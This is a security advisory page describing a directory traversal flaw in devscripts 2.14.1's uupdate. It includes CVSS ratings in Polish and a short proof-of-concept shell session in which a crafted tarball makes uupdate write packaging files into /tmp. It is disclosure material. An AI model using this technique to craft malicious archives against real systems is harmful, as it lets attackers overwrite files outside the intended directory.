devscripts 2.14.1 directory traversal

2014.02.09
Credit: Jakub Wilk
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-22


Ogólna skala CVSS: 5/10
Znaczenie: 2.9/10
Łatwość wykorzystania: 10/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Brak
Wpływ na integralność: Częściowy
Wpływ na dostępność: Brak

Package: devscripts Version: 2.14.1 Tags: security A malicious .orig.tar file can trick uupdate into patching files outside the source package directory. Proof of concept: $ apt-get source -qq chewmail gpgv: Signature made Tue Aug 15 08:10:17 2006 CEST using DSA key ID 16D970C6 gpgv: Can't check signature: public key not found dpkg-source: warning: failed to verify signature on ./chewmail_1.2-1.dsc dpkg-source: info: extracting chewmail in chewmail-1.2 dpkg-source: info: unpacking chewmail_1.2.orig.tar.gz dpkg-source: info: applying chewmail_1.2-1.diff.gz $ cd chewmail-1.2/ $ ls /tmp/* ls: cannot access /tmp/*: No such file or directory $ uupdate -v2 /path/to/chewmail-2.tar.gz New Release will be 2-1. Symlinking to pristine source from chewmail_2.orig.tar.gz... -- Untarring the new sourcecode archive /path/to/chewmail-2.tar.gz Success! The diffs from version 1.2-1 worked fine. Remember: Your current directory is the OLD sourcearchive! Do a "cd ../chewmail-2" to see the new package $ ls /tmp/* /tmp/changelog /tmp/compat /tmp/control /tmp/copyright /tmp/rules -- Jakub Wilk [chewmail-2.tar.gz (application/octet-stream, attachment)]

Referencje:

https://bugzilla.redhat.com/show_bug.cgi?id=1059947
http://www.securityfocus.com/bid/65260
http://www.openwall.com/lists/oss-security/2014/01/31/7
http://www.openwall.com/lists/oss-security/2014/01/31/11
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=737160


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top